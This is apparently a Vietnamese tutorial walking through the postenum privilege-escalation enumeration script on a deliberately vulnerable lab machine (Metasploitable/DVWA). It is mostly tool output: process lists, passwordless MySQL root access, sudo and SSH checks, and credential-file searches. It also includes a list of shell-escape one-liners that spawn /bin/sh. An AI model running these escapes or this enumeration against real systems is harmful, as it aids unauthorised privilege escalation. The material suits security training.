root       126  0.0  0.0      0     0 ?        S    13:20   0:00 [pdflush]
root       127  0.0  0.0      0     0 ?        S<   13:20   0:00 [kswapd0]
root       169  0.0  0.0      0     0 ?        S<   13:20   0:00 [aio/0]
root      1125  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksnapd]
root      1316  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata/0]
root      1318  0.0  0.0      0     0 ?        S<   13:20   0:00 [ata_aux]
root      1327  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_0]
root      1340  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_1]
root      1345  0.0  0.0      0     0 ?        S<   13:20   0:00 [ksuspend_usbd]
root      1353  0.0  0.0      0     0 ?        S<   13:20   0:00 [khubd]
root      1771  0.0  0.0      0     0 ?        S<   13:20   0:00 [scsi_eh_2]
root      2295  0.0  0.0      0     0 ?        S<   13:20   0:00 [kjournald]
root      2460  0.0  0.2   2216   652 ?        S<s  13:20   0:01 /sbin/udevd --daemon
root      2706  0.0  0.0      0     0 ?        S<   13:20   0:00 [kpsmoused]
root      3588  0.0  0.0      0     0 ?        S<   13:21   0:00 [kjournald]
root      3743  0.0  0.0      0     0 ?        S<   13:21   0:00 [rpciod/0]
root      3758  0.0  0.2   3648   564 ?        Ss   13:21   0:00 /usr/sbin/rpc.idmapd
root      3985  0.0  0.1   1716   488 tty4     Ss+  13:21   0:00 /sbin/getty 38400 tty4
root      3986  0.0  0.1   1716   492 tty5     Ss+  13:21   0:00 /sbin/getty 38400 tty5
root      3990  0.0  0.1   1716   488 tty2     Ss+  13:21   0:00 /sbin/getty 38400 tty2
root      3993  0.0  0.1   1716   492 tty3     Ss+  13:21   0:00 /sbin/getty 38400 tty3
root      3996  0.0  0.1   1716   488 tty6     Ss+  13:21   0:00 /sbin/getty 38400 tty6
root      4069  0.0  0.2   1872   540 ?        S    13:21   0:00 /bin/dd bs 1 if /proc/kmsg of /var/run/klogd/kmsg
root      4116  0.0  0.3   5312   996 ?        Ss   13:21   0:00 /usr/sbin/sshd
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
root      4399  0.0  0.0      0     0 ?        S    13:21   0:00 [lockd]
root      4400  0.0  0.0      0     0 ?        S<   13:21   0:00 [nfsd4]
root      4401  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4402  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4403  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4404  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4405  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4406  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4407  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4408  0.0  0.0      0     0 ?        S    13:21   0:00 [nfsd]
root      4412  0.0  0.1   2424   332 ?        Ss   13:21   0:00 /usr/sbin/rpc.mountd
root      4480  0.0  0.6   5412  1728 ?        Ss   13:21   0:00 /usr/lib/postfix/master
root      4487  0.0  0.4   5388  1204 ?        Ss   13:21   0:00 /usr/sbin/nmbd -D
root      4489  0.0  0.5   7724  1364 ?        Ss   13:21   0:00 /usr/sbin/smbd -D
root      4493  0.0  0.3   7724   812 ?        S    13:21   0:00 /usr/sbin/smbd -D
root      4508  0.0  0.3   2424   856 ?        Ss   13:21   0:00 /usr/sbin/xinetd -pidfile /var/run/xinetd.pid -stayalive -inetd_compat
root      4570  0.0  0.3   2104   896 ?        Ss   13:21   0:00 /usr/sbin/cron
root      4598  0.0  0.1   2052   348 ?        Ss   13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4599  0.0  0.1   2052   476 ?        S    13:21   0:00 /usr/bin/jsvc -user tomcat55 -cp /usr/share/java/commons-daemon.jar:/usr/share/tomcat5.5/bin/bootstrap.jar -outfile SYSLOG -errfile SYSLOG -pidfile /var/run/tomcat5.5.pid -Djava.awt.headless=true -Xmx128M -Djava.endorsed.dirs=/usr/share/tomcat5.5/common/endorsed -Dcatalina.base=/var/lib/tomcat5.5 -Dcatalina.home=/usr/share/tomcat5.5 -Djava.io.tmpdir=/var/lib/tomcat5.5/temp -Djava.security.manager -Djava.security.policy=/var/lib/tomcat5.5/conf/catalina.policy org.apache.catalina.startup.Bootstrap
root      4619  0.0  1.0  10596  2564 ?        Ss   13:21   0:00 /usr/sbin/apache2 -k start
root      4638  0.0 10.3  66344 26472 ?        Sl   13:21   0:00 /usr/bin/rmiregistry
root      4642  0.5  1.0  12208  2568 ?        Sl   13:21   0:08 ruby /usr/sbin/druby_timeserver.rb
root      4649  0.0  0.1   1716   488 tty1     Ss+  13:21   0:00 /sbin/getty 38400 tty1
root      4657  0.0  0.9   8540  2372 ?        S    13:21   0:01 /usr/bin/unrealircd
root      4659  0.3  4.7  14036 12016 ?        S    13:21   0:04 Xtightvnc :0 -desktop X -auth /root/.Xauthority -geometry 1024x768 -depth 24 -rfbwait 120000 -rfbauth /root/.vnc/passwd -rfbport 5900 -fp /usr/X11R6/lib/X11/fonts/Type1/,/usr/X11R6/lib/X11/fonts/Speedo/,/usr/X11R6/lib/X11/fonts/misc/,/usr/X11R6/lib/X11/fonts/75dpi/,/usr/X11R6/lib/X11/fonts/100dpi/,/usr/share/fonts/X11/misc/,/usr/share/fonts/X11/Type1/,/usr/share/fonts/X11/75dpi/,/usr/share/fonts/X11/100dpi/ -co /etc/X11/rgb
root      4664  0.0  0.4   2724  1188 ?        S    13:21   0:00 /bin/sh /root/.vnc/xstartup
root      4667  0.0  1.0   5936  2572 ?        S    13:21   0:00 xterm -geometry 80x24+10+10 -ls -title X Desktop
root      4670  0.3  1.9   8988  5000 ?        S    13:21   0:05 fluxbox
root      4704  0.0  0.6   2852  1544 pts/0    Ss+  13:22   0:00 -bash

[x] Is mysql running by root:
root      4193  0.0  0.5   2768  1304 ?        S    13:21   0:00 /bin/sh /usr/bin/mysqld_safe
mysql     4235  0.1  6.6 127560 17036 ?        Sl   13:21   0:02 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --user=mysql --pid-file=/var/run/mysqld/mysqld.pid --skip-external-locking --port=3306 --socket=/var/run/mysqld/mysqld.sock
root      4236  0.0  0.2   1700   556 ?        S    13:21   0:00 logger -p daemon.err -t mysqld_safe -i -t mysqld
www-data  4969  0.0  0.2   1784   540 pts/1    R+   13:44   0:00 grep mysql

Nó sẽ cố gắng xác định vị trí bất kỳ công việc cron nào trong các thư mục chung , cũng như bất kỳ cho root . Tôi cũng sẽ cung cấp cho chúng tôi nội dung của crontab, đây là danh sách các lệnh chạy thường xuyên được sử dụng bởi quản trị viên. Tiếp theo, chúng ta có thể thấy các dịch vụ đang chạy, bao gồm cả các dịch vụ đang chạy với quyền root và kiểm tra xem quy trình MySQL có hiện diện và chạy dưới quyền root hay không.

Giai đoạn 4: Thông tin cơ sở dữ liệu

Tùy chọn tiếp theo chúng tôi sẽ đề cập sẽ cố gắng kết nối với MySQL và đăng nhập – sử dụng công tắc -t để làm như vậy:

target:/var/tmp$ ./postenum.sh -t

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] TRYING ACCESS
[+] - Check for some methods for extract creds and get access as root
[x] Connect to MYSQL as root and non-pass:
[/] We can connect to the local MYSQL service as 'root' and without a password!
mysqladmin  Ver 8.41 Distrib 5.0.51a, for debian-linux-gnu on i486
Copyright (C) 2000-2006 MySQL AB
This software comes with ABSOLUTELY NO WARRANTY. This is free software,
and you are welcome to modify and redistribute it under the GPL license

Server version          5.0.51a-3ubuntu5
Protocol version        10
Connection              Localhost via UNIX socket
UNIX socket             /var/run/mysqld/mysqld.sock
Uptime:                 25 min 31 sec

Threads: 2  Questions: 446  Slow queries: 0  Opens: 420  Flush tables: 1  Open tables: 64  Queries per second avg: 0.291

Chúng ta có thể thấy rằng nó có thể kết nối với cơ sở dữ liệu dưới dạng root mà không cần mật khẩu. Sau đó nó cung cấp cho chúng tôi một số thông tin phiên bản, dữ liệu kết nối và thời gian hoạt động.

Giai đoạn 5: Công cụ phát triển & Shell Escapes

Tùy chọn tiếp theo mà chúng tôi sẽ đề cập sẽ tìm kiếm các công cụ phát triển phổ biến trên hệ thống, thường có thể bị lạm dụng và dẫn đến sự leo thang đặc quyền . Nó cũng sẽ thử một số thoát vỏ thông thường nếu có vỏ bị hạn chế. Sử dụng tùy chọn -l cho việc này:

target:/var/tmp$ ./postenum.sh -l

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] DEVELOPMENT TOOLS and LANGUAGES
[+] - Check for development tools and languages are installed/supported
/usr/bin/python
/usr/bin/perl
/usr/bin/php
/usr/bin/gcc
/usr/bin/cc
/usr/bin/nmap

[+] - Check for how files can be uploaded
/usr/bin/ftp
/bin/netcat
/bin/nc
/usr/bin/wget
/usr/bin/curl

[+] - Shell escape
awk    =        awk 'BEGIN {system("/bin/sh")}'
perl   =        perl -e 'exec "/bin/sh";'
python =        python -c 'import pty;pty.spawn("/bin/sh")'
php    =        php -r 'system("/bin/sh");'
ruby   =        ruby -e 'exec "/bin/sh"'
less   =        !sh
more   =        !sh
man    =        !sh
nmap   =        --interactive
nmap   =        echo "os.execute('/bin/sh')" > /tmp/shell.nse
find   =        find / -exec /usr/bin/awk 'BEGIN {system("/bin/sh")}' \;
find   =        find / -exec sh -i \;
vi     =        :!sh or :shell or -c '!sh'
vim    =        :!sh or :shell or -c '!sh'
gdb      =      shell

[+] - List all Environment Variables
SERVER_SIGNATURE=<address>Apache/2.2.8 (Ubuntu) DAV/2 Server at 10.10.0.50 Port 80</address>

ORIG_PATH_TRANSLATED=/var/www/dvwa/vulnerabilities/exec/index.php
TERM=xterm
HTTP_USER_AGENT=Mozilla/5.0 (X11; Linux x86_64; rv:68.0) Gecko/20100101 Firefox/68.0
HTTP_HOST=10.10.0.50
SERVER_PORT=80
REDIRECT_HANDLER=php5-cgi
DOCUMENT_ROOT=/var/www/
SCRIPT_FILENAME=/var/www/dvwa/vulnerabilities/exec/index.php
REQUEST_URI=/dvwa/vulnerabilities/exec/
SCRIPT_NAME=/dvwa/vulnerabilities/exec/index.php
HTTP_CONNECTION=keep-alive
REMOTE_PORT=38016
PATH=/usr/local/bin:/usr/bin:/bin
ORIG_SCRIPT_FILENAME=/usr/lib/cgi-bin/php
SERVER_ADMIN=webmaster@localhost
PWD=/var/tmp
REDIRECT_STATUS=200
HTTP_ACCEPT_LANGUAGE=en-US,en;q=0.5
HTTP_REFERER=http://10.10.0.50/dvwa/vulnerabilities/exec/
HTTP_ACCEPT=text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
HTTP_DNT=1
ORIG_SCRIPT_NAME=/cgi-bin/php
REMOTE_ADDR=10.10.0.1
SERVER_NAME=10.10.0.50
SHLVL=4
CONTENT_LENGTH=68
SERVER_SOFTWARE=Apache/2.2.8 (Ubuntu) DAV/2
QUERY_STRING=
SERVER_ADDR=10.10.0.50
GATEWAY_INTERFACE=CGI/1.1
HTTP_UPGRADE_INSECURE_REQUESTS=1
SERVER_PROTOCOL=HTTP/1.1
HTTP_ACCEPT_ENCODING=gzip, deflate
CONTENT_TYPE=application/x-www-form-urlencoded
REDIRECT_URL=/dvwa/vulnerabilities/exec/index.php
HTTP_COOKIE=security=low; PHPSESSID=c7e9261b3015fccc2d7518ea95244d5e
REQUEST_METHOD=POST
ORIG_PATH_INFO=/dvwa/vulnerabilities/exec/index.php
_=/usr/bin/printenv

[+] - List all available shells
# /etc/shells: valid login shells
/bin/csh
/bin/sh
/usr/bin/es
/usr/bin/ksh
/bin/ksh
/usr/bin/rc
/usr/bin/tcsh
/bin/tcsh
/usr/bin/esh
/bin/dash
/bin/bash
/bin/rbash
/usr/bin/screen

Chúng ta có thể thấy rằng nó tìm thấy một số công cụ và ngôn ngữ dev, chẳng hạn như Python, PHP và Nmap , trong số những công cụ khác. Nó cũng kiểm tra các công cụ có thể được sử dụng để tải lên các tệp , điều này có thể dẫn đến thỏa hiệp hơn nữa. Sau đó, nó liệt kê một số lệnh thoát shell, theo sau là các biến môi trường và shell có sẵn trên hệ thống.

Giai đoạn 6 Phiên bản phần mềm

Tùy chọn tiếp theo chúng tôi sẽ xem xét sẽ xác định một số thông tin phiên bản từ phần mềm phổ biến được cài đặt trên mục tiêu. Sử dụng công tắc -v để làm như vậy:

target:/var/tmp$ ./postenum.sh -v

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] SOFTWARES VERSION
[+] - Check apps and services version
[x] Sudo version (<= 1.8.20):
Sudo version 1.6.9p10

[x] MYSQL version:
mysql  Ver 14.12 Distrib 5.0.51a, for debian-linux-gnu (i486) using readline 5.2

[x] PostgreSQL version:
psql (PostgreSQL) 8.3.1
contains support for command-line editing

[x] Java version:
java version "1.5.0"
gij (GNU libgcj) version 4.2.4 (Ubuntu 4.2.4-1ubuntu3)

Copyright (C) 2007 Free Software Foundation, Inc.
This is free software; see the source for copying conditions.  There is NO
warranty; not even for MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.

Điều này cung cấp cho chúng tôi số phiên bản phần mềm cho Sudo , MySQL, PostgreSQL và Java .

Giai đoạn 7 Tập tin thú vị

Tùy chọn tiếp theo sẽ cố gắng xác định vị trí bất kỳ tệp thú vị nào có trên hệ thống có khả năng được sử dụng để leo thang đặc quyền. Sử dụng công tắc -c cho cái này:

target:/var/tmp$ ./postenum.sh -c

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] CONFIDENTIAL INFO and USER
[+] - Check list of users and super users
[x] Super user:
root:x:0:0:root:/root:/bin/bash
root

[x] Useful home users:
drwxr-xr-x 2 root     nogroup  4096 Mar 17  2010 /home/ftp
drwxr-xr-x 5 msfadmin msfadmin 4096 Jun 16  2018 /home/msfadmin
drwxr-xr-x 2 service  service  4096 Apr 16  2010 /home/service
drwxr-xr-x 3 user     user     4096 May  7  2010 /home/user

[x] Anything with /bin/bash /bin/sh /bin/dash:
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
msfadmin:x:1000:1000:msfadmin,,,:/home/msfadmin:/bin/bash
postgres:x:108:117:PostgreSQL administrator,,,:/var/lib/postgresql:/bin/bash
user:x:1001:1001:just a user,111,,:/home/user:/bin/bash
service:x:1002:1002:,,,:/home/service:/bin/bash

[+] - Check /etc for config files (recursive 1 level)
[x] All *.conf files in /etc (recursive 1 level):
-rw-r--r-- 1 root root 552 Apr  9  2008 /etc/pam.conf
-rw-r--r-- 1 root root 899 Nov  6  2007 /etc/gssapi_mech.conf
-rw-r----- 1 root fuse 216 Feb 26  2008 /etc/fuse.conf
-rw-r--r-- 1 root root 2405 Mar 13  2008 /etc/sysctl.conf
-rw-r--r-- 1 root root 2689 Apr  4  2008 /etc/gai.conf
-rw-r--r-- 1 root root 4430 May 20  2012 /etc/vsftpd.conf
-rw-r--r-- 1 root root 2975 Mar 16  2010 /etc/adduser.conf
-rw-r--r-- 1 root root 2969 Mar 11  2008 /etc/debconf.conf
-rw-r--r-- 1 root root 92 Oct 20  2007 /etc/host.conf
-rw-r--r-- 1 root root 13144 Nov 16  2007 /etc/ltrace.conf
-rw-r--r-- 1 root root 423 May 20  2012 /etc/hesiod.conf
-rw-r--r-- 1 root root 34 Mar 16  2010 /etc/ld.so.conf
-rw-r--r-- 1 root root 599 Jun 17  2006 /etc/logrotate.conf
-rw-r--r-- 1 root root 354 Mar  5  2007 /etc/fdmount.conf
-rw-r--r-- 1 root root 529 May 20  2012 /etc/inetd.conf
-rw-r--r-- 1 root root 475 Oct 20  2007 /etc/nsswitch.conf
-rw-r--r-- 1 root root 214 Mar  8  2008 /etc/updatedb.conf
-rw-r--r-- 1 root root 41 Jul  5  2018 /etc/resolv.conf
-rw-r--r-- 1 root root 34 Feb 18  2008 /etc/e2fsck.conf
-rw-r--r-- 1 root root 4793 Mar 28  2008 /etc/hdparm.conf
-rw-r--r-- 1 root root 342 Mar 16  2010 /etc/popularity-contest.conf
-rw-r--r-- 1 root root 417 Mar 27  2008 /etc/mke2fs.conf
-rw-r--r-- 1 root root 15280 Apr 28  2010 /etc/devscripts.conf
-rw-r--r-- 1 root root 1614 Nov 23  2007 /etc/syslog.conf
-rw-r--r-- 1 root root 1260 Feb 21  2008 /etc/ucf.conf
-rw-r--r-- 1 root root 145 Dec  2  2008 /etc/idmapd.conf
-rw-r--r-- 1 root root 600 Oct 23  2007 /etc/deluser.conf
-rw-r--r-- 1 root root 240 Mar 16  2010 /etc/kernel-img.conf
-rw-r--r-- 1 root root 1878 May  4  2008 /etc/cowpoke.conf
-rw-r--r-- 1 root root 289 May 20  2012 /etc/xinetd.conf

[x] Sudo permissions
[/] We can run sudo without supplying a password:
usage: sudo -h | -K | -k | -L | -l | -V | -v
usage: sudo [-bEHPS] [-p prompt] [-u username|#uid] [VAR=value]
            {-i | -s | <command>}
usage: sudo -e [-S] [-p prompt] [-u username|#uid] file ...

[+] - Check sensitive files
-rw-r--r-- 1 root root 1581 May 13  2012 /etc/passwd
-rw-r----- 1 root shadow 1207 May 13  2012 /etc/shadow
-rw-r--r-- 1 root root 886 Apr 16  2010 /etc/group
-r--r----- 1 root root 470 Mar 16  2010 /etc/sudoers

[+] - Check if anything interesting in the mail directory
[x] Interesting mail in /var/mail:
-rw------- 1 msfadmin mail   0 Apr 28  2010 msfadmin
-rw------- 1 root     mail 722 May  7  2010 root

[x] Seems /var/mail/root exist - you can try to read it:
./postenum.sh: line 792: : command not found

[+] - Check if anything interesting in the home/root directories
[x] Check if /root is accessible:
[/] Root directory can be accessible
drwxr-xr-x 2 root root 4.0K May 20  2012 Desktop
-rwx------ 1 root root  401 May 20  2012 reset_logs.sh
-rw-r--r-- 1 root root  138 Jun 19 13:21 vnc.log

[x] Interesting /home/* directory:
drwxr-xr-x 2 root     nogroup  4.0K Mar 17  2010 ftp
drwxr-xr-x 5 msfadmin msfadmin 4.0K Jun  6  2018 msfadmin
drwxr-xr-x 2 service  service  4.0K Apr 16  2010 service
drwxr-xr-x 3 user     user     4.0K May  7  2010 user

[x] History files of /home/*/:
lrwxrwxrwx 1 root root 9 May 14  2012 /home/msfadmin/.bash_history -> /dev/null
-rw------- 1 root root 4.1K May 14  2012 /home/msfadmin/.mysql_history
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history

[x] History files of /root:
-rw-r--r-- 1 root root 173 Jun 18  2020 /root/.bash_history
-rw------- 1 root root 215 Jun 18 13:46 /root/.mysql_history

[+] - Check for plain text password
[x] ~/.bash_history - snippet below:
export TERM=xterm-256color
export SHELL=bash
stty rows 56 columns 213
ls
export TERM=xterm
ls
gfffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff
ls
ls -la
cd /tmp/

~/.nano_history file doesn't exist:
~/.mysql_history file doesn't exist
~/.php_history file doesn't exist

[+] - Check SSH Dir/Files
[x] Any private-key info - /home/*/.ssh/:
drwx------ 2 msfadmin msfadmin 4096 May 17  2010 /home/msfadmin/.ssh

drwx------ 2 user user 4096 May  7  2010 /home/user/.ssh

[x] Any private-key info - /root/.ssh/:
drwxr-xr-x 2 root root 4096 May 20  2012 /root/.ssh/
ls: cannot open directory /home/user/.ssh: Permission denied
 [READABLE]

Check if PermitRootLogin is on:
[/] Root is allowed to login via SSH
yes

[+] - Check password policy information and Umask value
[x] Password Policy:
PASS_MAX_DAYS   99999
PASS_MIN_DAYS   0
PASS_WARN_AGE   7

[x] Current umask value:
0022
u=rwx,g=rx,o=rx

[+] - Accessible .rhosts files
[x] Rhost config file(s):
-rwx------ 1 msfadmin msfadmin 4 May 20  2012 /home/msfadmin/.rhosts

Đầu tiên, nó cung cấp một danh sách các siêu người dùng và người dùng, theo sau là bất cứ thứ gì từ / etc / passwd có vỏ. Tiếp theo, nó tìm kiếm các tệp cấu hình khác nhau, các tệp nhạy cảm và các quyền của sudo là như thế nào. Sau đó, nó kiểm tra thư và bất kỳ tập tin thú vị nào khác trong thư mục gốc và thư mục gốc. Cuối cùng, nó cung cấp cho chúng tôi lịch sử Bash, thông tin chính sách mật khẩu và bất kỳ khóa riêng nào cho SSH .

Giai đoạn 8: Các tệp khác & Bits dính

Tùy chọn tiếp theo chúng tôi sẽ giới thiệu sẽ cung cấp cho thông tin SUID và SGID liên quan đến hệ thống tập tin. Những loại tệp này thường có thể bị lạm dụng để leo thang đặc quyền khi bị định cấu hình sai. Nó cũng sẽ kiểm tra các tập tin ẩn hoặc bất kỳ bit thông tin hữu ích nào khác – sử dụng khóa -s để sử dụng:

target:/var/tmp$ ./postenum.sh -s

--------------------------------------------------------------------------

                 _
 _ __   ___  ___| |_ ___ _ __  _   _ _ __ ___
| '_ \ / _ \/ __| __/ _ \ '_ \| | | | '_ ' _ \
| |_) | (_) \__ \ ||  __/ | | | |_| | | | | | |  version : 1.0
| .__/ \___/|___/\__\___|_| |_|\__,_|_| |_| |_|
|_|

POST-ENUMERATION by mbahadou
--------------------------------------------------------------------------

 postenum - be the ROOT
 For help or reporting issues, visit https://github.com/mbahadou/postenum

[-] FILE SYSTEM
[+] - Check if anything interesting in the www directory
[x] Any interesting file/folder in /var:
drwxr-xr-x  2 root     root     4.0K May  8  2010 backups
drwxr-xr-x 12 root     root     4.0K Apr 28  2010 cache
drwxr-xr-x 37 root     root     4.0K May 20  2012 lib
drwxrwsr-x  2 root     staff    4.0K Apr 15  2008 local
drwxrwxrwt  3 root     root       60 Jun 19 13:21 lock
drwxr-xr-x 14 root     root     4.0K Jun 19 13:21 log
drwxrwsr-x  2 root     mail     4.0K May  7  2010 mail
drwxr-xr-x  2 root     root     4.0K Mar 16  2010 opt
drwxr-xr-x 14 root     root      580 Jun 19 13:21 run
drwxr-xr-x  5 root     root     4.0K Apr 28  2010 spool
drwxrwxrwt  2 root     root     4.0K Jun 19 13:35 tmp
drwxr-xr-x 10 www-data www-data 4.0K Aug  8  2018 www

[x] Any interesting file/folder in /var/www:
drwxrwxrwt  3 root     root     4.0K Jun 19  2019 dav
drwxr-xr-x  8 www-data www-data 4.0K May 20  2012 dvwa
-rw-r--r--  1 www-data www-data  891 May 20  2012 index.php
drwxr-xr-x 10 www-data www-data 4.0K May 14  2012 mutillidae
drwxr-xr-x 11 www-data www-data 4.0K May 14  2012 phpMyAdmin
-rw-r--r--  1 www-data www-data   19 Apr 16  2010 phpinfo.php
drwxr-xr-x  3 www-data www-data 4.0K May 14  2012 test
drwxrwxr-x 22 www-data www-data  20K Apr 12  2018 tikiwiki
drwxrwxr-x 22 www-data www-data  20K Apr 16  2010 tikiwiki-old
drwxr-xr-x  7 www-data www-data 4.0K Apr 16  2010 twiki

ls: cannot access /var/www/html: No such file or directory

[x] Search on config.* and db.* files on /var:
-rw-r--r-- 1 root root 21424 May 20  2012 /var/cache/debconf/config.dat
-rw-r--r-- 1 root root 21308 May 20  2012 /var/cache/debconf/config.dat-old
-rw-r--r-- 1 www-data www-data 18684 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/vendors/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 2772 Mar 16  2010 /var/www/dvwa/external/phpids/0.6/lib/IDS/Config/Config.ini
-rw-r--r-- 1 www-data www-data 576 May 20  2012 /var/www/dvwa/config/config.inc.php
-rw-r--r-- 1 www-data www-data 576 Aug 26  2010 /var/www/dvwa/config/config.inc.php~
-rwxr-xr-x 1 www-data www-data 175 Apr  4  2018 /var/www/mutillidae/config.inc
-rwxr-xr-x 1 www-data www-data 20810 Apr 11  2011 /var/www/mutillidae/owasp-esapi-php/lib/htmlpurifier/HTMLPurifier/Config.php
-rw-r--r-- 1 www-data www-data 60881 Dec  9  2008 /var/www/phpMyAdmin/libraries/config.default.php
-rw-r--r-- 1 www-data www-data 4066 Dec  9  2008 /var/www/phpMyAdmin/libraries/auth/config.auth.lib.php
-rw-r--r-- 1 www-data www-data 35105 Dec  9  2008 /var/www/phpMyAdmin/libraries/Config.class.php
-rw-r--r-- 1 www-data www-data 2093 Dec  9  2008 /var/www/phpMyAdmin/config.sample.inc.php
-rw-r--r-- 1 www-data www-data 1584 Dec  9  2008 /var/www/phpMyAdmin/setup/frames/config.inc.php
-rw-r--r-- 1 www-data www-data 2719 Dec  9  2008 /var/www/phpMyAdmin/setup/config.php
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki-old/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3383 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3449 Feb 21  2008 /var/www/tikiwiki-old/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki-old/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki-old/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki-old/img/icons/config.gif
-rw-rw-r-- 1 www-data www-data 1770 Aug 26  2004 /var/www/tikiwiki/lib/sheet/conf/config.inc.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 28  2006 /var/www/tikiwiki/lib/Galaxia/config.tikiwiki.php
-rw-rw-r-- 1 www-data www-data 3219 Jan 30  2006 /var/www/tikiwiki/lib/Galaxia/config.php
-rw-rw-r-- 1 www-data www-data 3259 Jan 28  2004 /var/www/tikiwiki/lib/Galaxia/config.xaraya.php
-rw-rw-r-- 1 www-data www-data 9269 Nov 12  2005 /var/www/tikiwiki/lib/wiki3d/src/java/br/arca/morcego/Config.java
-rw-rw-r-- 1 www-data www-data 45 Mar 12  2005 /var/www/tikiwiki/lib/smarty/unit_test/config.php
-rw-rw-r-- 1 www-data www-data 258 Apr 24  2003 /var/www/tikiwiki/img/icons/config.gif

[+] - Search for hidden files
[x] Hidden files:
-rw-r--r-- 1 service service 586 Apr 16  2010 /home/service/.profile
-rw-r--r-- 1 service service 2928 Apr 16  2010 /home/service/.bashrc
-rw-r--r-- 1 service service 220 Apr 16  2010 /home/service/.bash_logout
-rw-r--r-- 1 user user 586 Mar 31  2010 /home/user/.profile
-rw------- 1 user user 165 May  7  2010 /home/user/.bash_history
